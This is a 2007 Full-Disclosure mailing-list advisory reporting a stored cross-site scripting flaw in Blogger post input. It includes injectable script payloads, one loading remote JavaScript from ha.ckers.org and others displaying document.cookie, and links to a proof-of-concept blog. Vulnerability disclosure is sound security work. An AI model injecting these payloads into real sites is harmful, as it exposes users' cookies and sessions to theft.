------------------------------------------------------ BLOGGER XSS VULNERABILITY ------------------------------------------------------
Blogspot.com Homepage: http://www.blogspot.com and Blogger.com Homepage: http://www.blogger.com Affected files: Post's Input boxes ------------------------------------------------------ XSS DETAILS ------------------------------------------------------ XSS vuln via injecting javascript code into any post. Blogger doesn't sanitize user input during post process. Try injecting the following code into a post <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> or just the well known <SCRIPT >alert(document.cookie);</SCRIPT> or <SCRIPT >alert(document.domain);</SCRIPT> I've noticed that for any blog hosted at blogspot.com the cookie will be not shown. Otherwise, if the blog is located inside your web site, the cookie will be shown. This probably depends on webserver configuration... ------------------------------------------------------ Proof Of Concept ------------------------------------------------------ http://pocasiculezza.blogspot.com/ ----------------------------------------------------- HISTORY ------------------------------------------------------ Discovered : 07/11/2007 by Daniele Costa Published : 07/11/2007 by Daniele Costa -- =============== Daniele Costa CheapWare Informatica http://www.cheapware.it http://www.iteam5.net http://www.siculezza.it http://www.thetubo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
